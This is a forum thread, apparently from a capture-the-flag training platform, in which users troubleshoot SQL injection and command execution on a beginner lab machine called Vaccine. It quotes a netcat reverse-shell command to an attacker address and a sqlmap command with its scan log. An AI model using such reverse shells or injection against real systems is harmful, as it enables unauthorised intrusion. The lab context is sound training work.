Machine name: vaccine stuck on getting SQL code execution shell

@sechzehn If you can already navigate trough the tables your almost done. Think about what you could find in the tables? A username? Maybe a hashed password? On the machine ssh is activated with your gained information you could just simply login via ssh instead of trying to upload a shell :wink:

I think it’s not a problem with the machine itself but rather something caused by users messing around in /etc/postgresql since I had the same problem but was able to complete the machine successfully by exploiting immediately after a reset. Little tip: the section of the walktrough mentioning vim does not mean you have to edit the file!

Hello everyone,

For those experiencing issues with port 80 interaction on Vaccine, please take note that as @drugantibus reported, this is due to users exiting their os-shell improperly. You will have to issue a reset vote every time Vaccine is unresponsive on port 80 or switch servers to find a working Vaccine SQL service.

Thank you.

Type your comment> @0nenine9 said:

Hello everyone,

For those experiencing issues with port 80 interaction on Vaccine, please take note that as @drugantibus reported, this is due to users exiting their os-shell improperly. You will have to issue a reset vote every time Vaccine is unresponsive on port 80 or switch servers to find a working Vaccine SQL service.

Thank you.

I’ve been stuck on this for days now because people keep on crashing the server. Literally as soon is a reset vote is done someone almost IMMEDIATELY screws it up again… Very frustrating, especially as this is supposed to be a beginner box.

Does VIP access include VIP access to the starting servers or only the servers past this point? At this stage I’m willing to just throw money at the issue so I can move on.

1 Like

I’ve been stuck on this box for over a week. Im double frustrated as I bought VIP access when I first started but can’t use it as this box is in my way.

I was able to get the --os-shell to work earlier but then it timed out when I attempted to execute the reverse bash shell.

Getting through this box is going to need some stubborn determination I think. If anything its a good thing that its not working becuase its going to force us to think for ourselves and self learn what we don’t know. There will be another way in I am sure.

I’m not using MSF, I’m trying to use it sparingly as I don’t believe MSF is a very good tool for learning. I’m trying a manual exploit but I keep getting timeouts on port 80 which makes that kind of hard.

Hello,

If you want to do it by hand you can follow this link:

And if someone prefers, I coded a python script available here:

good luck

Hello,
I have the same issue: time out when using the --os-shell option with sqlmap.
Doing it manually (with florianges’s python script) does not seem to solve the issue.

Same here with sqlmap and manually or with @florianges script, which is also not working and seems to fail after the last command: “ERROR: program “/tmp/XXXXX/nc 10.10.14.XX 4444 -e /bin/bash” failed DETAIL: command not found”

Type your comment> @florianges said:

Hello,

If you want to do it by hand you can follow this link:
Authenticated Arbitrary Command Execution on PostgreSQL 9.3 > Latest | by Greenwolf | Greenwolf Security | Medium

And if someone prefers, I coded a python script available here:
GitHub - florianges/-HTB-Vaccine_sql_injection

good luck

Thanks for this really appreciate the assistance! I finally managed to root this box!

Hello,
@SIFGU and @OS41380

Did you open the script and read the comments and meet all of the requirements listed?
Have you watched the youtube presentation video?

Type your comment> @Pyroteq said:

Type your comment> @0ne-nine9 said:

Hello everyone,

For those experiencing issues with port 80 interaction on Vaccine, please take note that as @drugantibus reported, this is due to users exiting their os-shell improperly. You will have to issue a reset vote every time Vaccine is unresponsive on port 80 or switch servers to find a working Vaccine SQL service.

Thank you.

I’ve been stuck on this for days now because people keep on crashing the server. Literally as soon is a reset vote is done someone almost IMMEDIATELY screws it up again… Very frustrating, especially as this is supposed to be a beginner box.

Does VIP access include VIP access to the starting servers or only the servers past this point? At this stage I’m willing to just throw money at the issue so I can move on.

Hiya,

Yes VIP includes a separate server for starting-point VIP. However, there’s no assurance that VIP members will not create instability on the box, as the number of VIP servers for starting-point is smaller than that of main machines.

Maybe try tackling the machine at a different time of day.

Thanks!

I guess the box is still stuck, I voted to reset the lab.

I really struggled on this one with the same issues, gave up on sqlmap and used @florianges ’ Python script. Struggled to understand the nc parameter I was meant to set. Couldn’t get it working at first but in the end I literally followed his video step by step, copied the bin file (cp /bin/nc .) into the same location as the web server and then it worked. I was just taking an nc.exe file and copying it into the location and then setting the parameter to nc.exe but that was wrong.

@florianges this script is awesome - worked perfectly for me! Thanks so much!

Type your comment> @florianges said:

Hello,
@SIFGU and @OS41380

Did you open the script and read the comments and meet all of the requirements listed?
Have you watched the youtube presentation video?

https://www.youtube.com/watch?v=2k7IirmLlxs

I do that,
but nothing showing with “nc”

Type your comment> @ma24th said:

I do that,
but nothing showing with “nc”

I think the web server is down now. It was loading fine earlier but it won’t load in the browser now either…

We need 2 more votes to reset the lab in US VIP if you want to join…

hi guys need help with this machine… when i run the sqlmap with the right cookie it is giving me a 302 redirect to index.php

anyone know how to get pass this?

sqlmap -u ‘http://10.10.10.46/dashboard.php?search=a’ --cookie=“PHPSESSID:3dr3h62vjq0tn58mu5o1oep0e8”
[21:43:28] [INFO] testing connection to the target URL
got a 302 redirect to ‘http://10.10.10.46:80/index.php’. Do you want to follow? [Y/n] n
[21:43:29] [INFO] testing if the target URL content is stable
[21:43:29] [WARNING] GET parameter ‘search’ does not appear to be dynamic
[21:43:30] [WARNING] heuristic (basic) test shows that GET parameter ‘search’ might not be injectable
[21:43:30] [INFO] testing for SQL injection on GET parameter ‘search’
[21:43:30] [INFO] testing ‘AND boolean-based blind - WHERE or HAVING clause’
[21:43:30] [INFO] testing ‘Boolean-based blind - Parameter replace (original value)’
[21:43:30] [INFO] testing ‘MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)’
[21:43:31] [INFO] testing ‘PostgreSQL AND error-based - WHERE or HAVING clause’
[21:43:31] [INFO] testing ‘Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)’
[21:43:32] [INFO] testing ‘Oracle AND error-based - WHERE or HAVING clause (XMLType)’
[21:43:32] [INFO] testing ‘MySQL >= 5.0 error-based - Parameter replace (FLOOR)’
[21:43:32] [INFO] testing ‘Generic inline queries’
[21:43:32] [INFO] testing ‘PostgreSQL > 8.1 stacked queries (comment)’
[21:43:32] [INFO] testing ‘Microsoft SQL Server/Sybase stacked queries (comment)’
[21:43:33] [INFO] testing ‘Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)’
[21:43:33] [INFO] testing ‘MySQL >= 5.0.12 AND time-based blind (query SLEEP)’
[21:43:34] [INFO] testing ‘PostgreSQL > 8.1 AND time-based blind’
[21:43:34] [INFO] testing ‘Microsoft SQL Server/Sybase time-based blind (IF)’
[21:43:34] [INFO] testing ‘Oracle AND time-based blind’